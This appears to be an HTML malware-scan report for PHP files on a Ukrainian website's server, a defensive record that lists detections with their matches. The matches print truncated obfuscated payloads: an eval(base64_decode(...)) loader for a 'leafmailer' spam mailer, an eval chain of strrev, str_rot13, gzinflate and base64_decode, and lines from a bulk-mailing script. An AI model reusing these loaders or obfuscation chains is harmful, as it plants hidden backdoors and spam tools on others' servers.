<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 162cf671 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 162cf671)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">hcnJheV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 407651f7 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 407651f7)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">wcmludG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7186bb8d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7186bb8d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RfUE9TV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">N0cl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7f5d33bf <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7f5d33bf)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">JF9SRVFVRVNU</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">leGVjK</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">pbmNsdWRl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">c3Rhd</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3Blb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Z1bmN0aW9u</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VjaG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign e6546205 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: e6546205)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">kX1BPU1</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ee1cb326 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ee1cb326)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">9wZW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ff4f5344 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ff4f5344)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FycmF5X</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_93").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ovadyzqvu.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.06 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 20:10:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 20:10:28</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_94" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSvuX0l+i/6Jm9xfGkJT3L4yTp5urFQ/jX0Q...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $LNuWx = '</span><span style="color: #0000BB">gzinflate</span><span style="color: #DD0000">'; $sJhXG = '</span><span style="color: #0000BB">str_rot13</span><span style="color: #DD0000">'; $Shgrt = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; echo '</span><span style="color: #007700"><</span><span style="color: #0000BB">br</span><span style="color: #007700">> </span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); eval($Shgrt($sJhXG($LNuWx($DesQW('</span><span style="color: #0000BB">rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf</span><span style="color: #007700">/</span><span style="color: #0000BB">h7yy8iIOHH</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$Shgrt</span><span style="color: #007700">(</span><span style="color: #0000BB">$sJhXG</span><span style="color: #007700">(</span><span style="color: #0000BB">$LNuWx</span><span style="color: #007700">(</span><span style="color: #0000BB">$DesQW</span><span style="color: #007700">(</span><span style="color: #DD0000">'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSv...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 eval_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RinY</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_94").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/msfzx.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 161.68 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 18:55:01</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 18:55:01</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 285</span><br><table id="file_95" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1007</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1009</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1043</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1063</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1068</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1096</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
